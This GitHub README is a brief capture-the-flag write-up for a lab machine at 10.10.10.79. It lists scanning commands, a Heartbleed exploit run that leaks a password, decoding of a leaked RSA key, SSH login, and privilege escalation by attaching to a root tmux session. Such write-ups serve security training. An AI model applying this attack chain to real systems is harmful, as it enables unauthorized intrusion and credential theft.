Skip to content

Latest commit

 

History

History
78 lines (43 loc) · 1.19 KB

README.md

File metadata and controls

78 lines (43 loc) · 1.19 KB
rustscan 10.10.10.79

Alt text

After knowing, the 22,80,443 ports are open, let's do nmap scan.

nmap -A -sC -sV -p22,80,443 --script=vuln 10.10.10.79 -Pn

We got soo big result. (CVE-2014-0160).

Alt text

That's the vulnerability called 'Heartbleed'. Let's exploit it.

I find exploit code already.

Alt text

Let's run it.

python2 32764.py 10.10.10.79 -p 443

Alt text

Once, we decode this, we know the password.

password: heartbleedbelievethehype

Let's download hype_key file.

wget https://10.10.10.79/dev/hype_key --no-check-certificate

Now, we decode this by using xxd.

cat hype_key | xxd -r -p

Alt text

We grab RSA key from here.

Then add into id_rsa file and give '600' permissions for this and login.

Alt text

user.txt

Alt text

Once, we look at the history command result and paste into shell.

Alt text

Hola , we are root user.

tmux -S /.devs/dev_sess

root.txt

Alt text